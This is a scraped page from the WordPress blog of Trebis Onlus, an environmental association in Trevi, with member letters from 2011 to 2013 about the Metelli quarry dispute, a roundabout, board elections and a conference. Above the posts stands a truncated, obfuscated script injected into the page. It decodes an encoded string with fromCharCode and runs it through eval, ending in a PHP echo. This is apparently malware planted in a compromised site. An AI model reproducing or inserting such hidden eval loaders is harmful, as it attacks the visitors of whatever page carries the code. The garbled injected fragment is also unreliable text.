q4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq70Zq6aZq61Zq5aZq67Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[gzr](\"Zq\");}uwo=cpf;uoukoc=[];for(ymg=22-20-2;-ymg 1420!=0;ymg =1){ubtze=ymg;if((0x19==031))uoukoc =pivr.fromCharCode(eval(xcf uwo[1*ubtze]) 0xa-nhmv);}ilqz=eval;if(Math.ceil(5.5)===6)ilqz(uoukoc)}";echo $x;} ?>

Trebis Onlus Solo un altro weblog targato WordPress

A chinese lion statue

Basta con le ruspe salviamo l'Italia
di Carlo Petrini

Visto che in tv i plastici per raccontare i crimini più efferati sembrano diventati irrinunciabili, vorrei allora proporne uno di sicuro interesse: una riproduzione in scala dell'Italia, un'enorme scena del delitto. Le armi sono il cemento di capannoni, centri commerciali, speculazioni edilizie e molti impianti per produrre energia, rinnovabile e non; i moventi sono la stupidità e l'avidità; gli assassini tutti quelli che hanno responsabilità nel dire di sì; i complici coloro che non dicono di no; le vittime infine gli abitanti del nostro Paese, soprattutto quelli di domani. (continua)

Aggiornamento sulla cava di Metelli

admin Febbraio 16th, 2013

Cari Soci

               Il Commissario Prefettizio, Dr Angelo Gallo Carrabba, mi ha convocato questa settimana per chiarire gentilmente un punto rimasto in sospeso dopo il colloquio avutosi il 17 gennaio con membri del consiglio della Trebis. Dopo aver compiuto delle ricerche, mi ha detto, ha potuto stabilire che la cava Metelli è legalmente una cava attiva, e che la nostra impressione che fosse stata dichiarata una cava dismessa era probabilmente dovuta a un malinteso. L’attuale proroga del contratto per scavare scade nel settembre di quest’anno, ma nel caso che la quantità di materiale da estrarre prevista nel contratto non fosse ancora esaurita, dovrà essere concessa un’ulteriore proroga di due anni. Per quanto riguarda le richieste della ditta 1) di poter scavare più in basso del previsto, e 2) di ampliare la zona estrattiva, ancora non si è deciso. Gli accertamenti necessari per la seconda richiesta impegneranno molto tempo - un anno o forse un anno e mezzo.   Cordiali saluti, Patricia

Rotatoria di Piazza Umbra

admin Febbraio 2nd, 2013

Cari soci

                so che molti soci, io inclusa, lamentano da molto tempo lo stato di abbandono del terreno dentro la rotatoria accanto a Piazza Umbra. Così, dopo l’incontro col Commissario prefettizio il 17 gennaio, abbiamo colto l’occasione per interpellare l’Architetto Bettini (Lavori Pubblici e Urbanistica) sulla situazione. Ci ha spiegato che una soluzione è stata difficile perchè il terreno ha tre proprietari : una piccola striscia è di Trevi, una più grande è di Foligno e un’altra appartiene alla Provincia. Finalmente, comunque, i tre si sono messi d’accordo di incaricare il Comune di Trevi  della gestione del terreno.   Il Comune darà all’amministrazione di Piazza Umbra - la cui direttrice, sembra, è molto ansiosa di vederla sistemata - il compito di abbellirla.  Speriamo  succeda presto!

Aggiornamento sulla cava di Metelli

admin Febbraio 2nd, 2013

Cari soci

               l’incontro, da tempo atteso, di cinque membri del consiglio della Trebis col Commissario Prefettizio, Dr.  Angelo Gallo Carrabba, ha avuto luogo giovedì 17 gennaio (chiedo scusa per il ritardo nel referire). Il Commissario ci ha accolto molto cordialmente, dicendosi felice di avere l’occasione di conoscerci - avendo sentito delle nostre attività in passato - e di essersi informato sul tema della cava Metelli, motivo per il quale abbiamo chiesto l’incontro.

               Gli abbiamo spiegato le nostre perplessità per quanto riguarda la cava, la quale - almeno così ci risulta - doveva essere una cava dismessa, con l’estrazione limitata e finalizzata solo al riambientamento. La chiusura della cava, però, è stata sempre rimandata con  proroghe argomentando che la quantità di materiali previsti non è stata ancora completemente estratta. L’ultima proroga scade nell’ottobre di quest’anno. Nel frattempo i proprietari della cava hanno acquistato, per una cifra molto elevata, parecchio terreno accanto  con l’evidente e manifestata intenzione di ampliarla. Abbiamo chiesto chiarimento sullo stato giuridico attuale della cava. Abbiamo anche chiesto di sapere chi effettua controlli sulle attività di estrazione, quando, e con quali esiti.

               L’Arch. Giuseppe Bettini, responsabile dei Lavori Pubblici e  Urbanistica del Comune, che assisteva il Commissario, ci ha riferito  che il Comune ha ricevuto due richieste da parte dei proprietari della cava. La prima è una richiesta di ampliamento per dare accesso a nuovi giacimenti di materiale. La seconda è una richiesta di variante all’attuale contratto che permetterebbe di scavare ancora più in profondità nel pozzo centrale  di quanto finora previsto. E’ in corso una valutazione di queste richieste. Nessuna decisione è stata ancora presa.

               Da quando, qualche anno fa, molte competenze sulle cave sono state trasferiti alle Province, i controlli e il monitoraggio delle attivita spettano alla polizia mineraria, ci ha detto l’architetto. Finora non ci sono state irregolarità, ma della periodicità dei controlli non sapeva niente e ci ha promesso che si sarebbe informato al riguardo.

               L’architetto considera la cava “a tutti gli effetti” una cava attiva. Ma alla fine siamo usciti dall’incontro senza un’idea veramente chiara sul suo stato effettivo  : è attiva o esaurita?  A tal proposito né i tecnici presenti, né il Commissario hanno saputo rispondere, ma si sono impegnati ad esaminare la cosa attentamente.  Il loro promesso impegno ci è parso sincero. 

               Abbiamo anche sollevato il tema delle varie denunce e lamentele dei residenti della zona vicino alla cava per quanto riguarda l’uso di esplosivi, a volte di primissima mattina, o con una forza allarmante. I nostri interlocutori hanno preso atto  dei nostri commenti.

               Da quello che ci ha detto il Commissario, concludendo la seduta, ci sembra che terrà in considerazione i nostri argomenti quando verrà il momento di prendere decisioni sul futuro della cava. Siamo molto felici di aver avuto l’occasione di portare a conoscenza del Commissario tale argomento.

Auguri di un buon Natale e di un felice anno nuovo

admin Dicembre 24th, 2012

Cari Soci
l’anno 2012 è stato un po’ (troppo) tranquillo. Neanche l’incontro col commissario si è ancora verificato, a causa dei suoi tanti impegni anche fuori Trevi, ma ci è stato promesso un’appuntamento dopo le feste. E nel 2013 ci sarà tanto da fare!
Nel frattempo vi auguro tutti un Natale bellissimo, felice e sereno, e un anno nuovo che porterà tutto quello che desiderate!
Patricia

Aggiornamenti

admin Novembre 16th, 2012

Cari Soci
al contrario di quanto può sembrare, la Trebis è viva e attiva! Il consiglio sta lavorando sul tema molto complesso e difficile, ma molto importante, della cava Metelli che, come sapete, suscita non pochi perplessità. Abbiamo rivolto varie domande al Commissario, che gentilmente ci ha risposto e ora cerchiamo un’incontro personale col Commissario per chiarire alcuni punti. Dopodichè vogliamo invitarvi ad una riunione per sentire l’esito e per discutere delle proposte per iniziative nel 2013.
Cordiali saluti, Patricia Clough

Lettera al commissario prefettizio sulla cava Metelli

admin Luglio 9th, 2012

Cari soci
preoccupato dalle varie attività poco chiare intorno alla cava Metelli, il consiglio della Trebis ha mandato una lettera a Dott. Angelo Gallo Carabba, commissario prefettizio, chiedendo informazioni e documenti relativi alla Cava. Ecco il testo della nostra lettera:

Egr. Sig. Commissario,

La Trebis Onlus è un’Associazione sorta alcuni anni fa con il sostegno di un centinaio di membri, che si è assunta il compito di diffondere tra gli abitanti e i residenti di Trevi l’importanza della preservazione ambientale e paesaggistica della cittadina, senza rinunciare ad un equilibrato sviluppo economico dell’intero territorio comunale.

L’Associazione Trebis, nell’ambito delle finalità previste dallo Statuto, di cui si allega copia, vista la persistente attività estrattiva della Cava Metelli il località Scoppeto confermata dall’uso giornaliero di sostanze esplosive per l’estrazione di materiali di cava, chiede che vengano fornite informazioni scritte sui seguenti punti :

A) La conoscenza esatta delle procedure adottate a seguito della Delibera del Consiglio Comunale N.3 del 25/02/2011, relativa alla richiesta di ampliamento del sito su cui implementare l’attività estrattiva da parte della Ditta Metelli S.p.A.;

B) I controlli posti in essere relativi all’impatto ambientale della suddetta richiesta di ampliamento e l’eventuale esistenza di vincoli ambientali (nazionali e regionali) su tale territorio;

C) La quantità del materiale estratto dal 2009 ad oggi in relazione alla normativa regionale vigente;

D) I controlli effettuati a mezzo del tecnico incaricato in base alla convenzione fra il Comune di Trevi e la Ditta Metelli del 1993 o successive, il tutto con dati numerici e date;

E) La persistenza o meno della c.d. “escavazione a pozzo”;

F) L’uso di materiali esplosivi;

G) L’ammontare della quota per tonnellata che il Comune di Trevi riceve dalla ditta escavatrice;

H) L’adempimento dei controlli sulla emissione di polveri in relazione alla salute dei cittadini;

I) Si chiede inoltre il rilascio delle copie delle autorizzazioni e delle convenzioni in possesso della S.p.A. Metelli per lo sfruttamento della cava in questione.

Sicuri della Sua attenzione a soddisfare le richieste dell’Associazione e disponibili ad un eventuale incontro, La ringraziamo anticipatamente e porgiamo i più cordiali saluti.

Assemblea ordinaria: il nuovo consiglio direttivo

admin Novembre 14th, 2011

La Trebis affronterà il terzo biennio della sua esistenza con un consiglio direttivo rinnovato. L’assemblea generale ha anche deciso venerdì sera di organizzare incontri molto informali dei soci ogni due-tre mesi per lanciare e discutere idee e per coinvolgere i soci più direttamente nelle attività dell’associazione. A parte il suo ruolo costituzionale da cane da guardia ambientale, l’associazione vuole inoltre contribuire maggiormente alla sensibilizzazione ambientale e paesaggistica dei cittadini organizzando più spesso convegni su problemi attuali del territorio.
Il nuovo consiglio è composto da: Maria Pia Barbini, Patricia Clough, Gianni Furiani, Augusto Martani, Clarissa Rossini e Caroline Wooden. Presidente è di nuovo Patricia Clough, Vice Presidente Clarissa Rossini.  Gli altri incarichi saranno decisi alla prima riunione del consiglio.
Un cordiale saluto a tutti

Assemblea del giorno 11 novembre - rinnovo consiglio direttivo

admin Novembre 8th, 2011

Cari Soci

E’ convocata per venerdì 11 novembre 2011 alle ore 21, nella sala dell’impresa Olio Trevi (dietro il Cityper di piazza Umbria) gentilmente messa a nostra disposizione dal socio Angelo Guidobaldi, l’assemblea dei soci per il rinnovo del consiglio direttivo.

Invito tutti i soci a partecipare a questo importante evento, ricordando che è possibile, in caso di assenza, dare la delega ad altro socio che parteciperà all’assemblea.

Vi prego di estendere l’invito anche a quanti possono attivamente impegnarsi nell’Associazione. Sarebbe auspicabile, infatti, allargare il numero dei soci avvicinando quei cittadini di Trevi sensibili alla tutela del paesaggio, delle bellezze storico artistiche e delle tradizioni di questo nostro territorio.

Il tesseramento di nuovi soci ed il regolare pagamento della quota annuale da parte dei vecchi soci ci consentirebbe anche di recuperare risorse finanziarie, che per una associazione di volontari quale la Trebis sono fondamentali per la sopravvivenza.

I soci che intendono candidarsi o proporre nominativi per il consiglio direttivo possono usare il nostro sito web www.trebisonlus.it oppure rivolgersi direttamente alla sottoscritta (tel. 0742 381206).

L’iniziativa che si è tenuto lo scorso sabato 5 novembre – che ha registrato successo di pubblico e notevole interesse – conclude il lavoro svolto in questi anni dal consiglio direttivo uscente, che si è occupato in particolare modo del nuovo strumento urbanistico adottato dalla precedente amministrazione comunale: dopo aver fatto una assemblea degli iscritti su questo tema, Trebis ha presentato al Comune le osservazioni al PRG, purtroppo respinte in gran parte. Abbiamo condotto anche una campagna di sensibilizzazione, in più fasi, con manifesti, sulla tutela del nostro territorio, ed avanzato varie proposte all’Amministrazione comunale su arredo urbano, trasparenza, situazione idrogeologica, chiusura al traffico di piazza Mazzini. Abbiamo continuato a vigilare sulle ex serre, per le quali ormai è stato abbandonato il velleitario progetto di mega villaggio turistico, sostituito purtroppo dal progetto di un mega parco fotovoltaico, così come abbiamo continuato a monitorare l’attività estrattiva presente nell’ambito comunale.

Il lavoro da fare è ancora molto, però sono fiduciosa che, con il contributo dei soci che si renderanno disponibili ad impegnarsi nel nuovo direttivo, la Trebis potrà continuare a svolgere un ruolo propositivo per la salvaguardia delle bellezze del nostro territorio.

Ci vediamo tutti venerdì sera! Un cordiale saluto.

Patricia Clough

Presidente

Acqua, Terra, Fotovoltaico - Trevi 05.11.2011

admin Novembre 3rd, 2011

Cari Soci
come sapete, la nostra conferenza “Acqua, Terra, Fotovoltaico - quale futuro per la nostra valle?” si terrà sabato 5 novembre alle 15 a Villa Fabri. Mi auguro che tutto possiate venire.

Cordiali saluti.

convegnoacquaterrafotovoltaico.jpg

Una nuova iniziativa della Trebis

admin Ottobre 5th, 2011

Cari Soci
con l’arrivo dell’autunno la Trebis rilancia il dibattito sul futuro della nostra bellissima valle con una conferenza dal titolo “Acqua, Terra, Fotovoltaico - -Quale futuro per la nostra valle?” che si terrà il pomeriggio di  sabato 5 novembre a Villa Fabri.
Come indicato dal titolo, il tema della conferenza sarà l’agricoltura della valle con particolare attenzione all’agricoltura biologica di qualità, alla tutela del paesaggio e delle acque, all’occupazione e sviluppo economico,  al fotovoltaico.
Venerdì 11 novembre  sarà convocata l’assemblea ordinaria dell’Associazione alle ore   21 nella sala della ditta “Il Frantoio” (dietro Piazza Umbra) per eleggere il nuovo consiglio direttivo e per discutere le attività del prossimo anno. Speriamo di attrarre anche nuovi soci che con entusiasmo si confrontino con le sfide che ancora ci aspettano.
Vi preghiamo di prendere nota di tutti e due gli appuntamenti e di partecipare numerosi perchè le attività della nostra associazione abbiano  sempre più forza.

Next »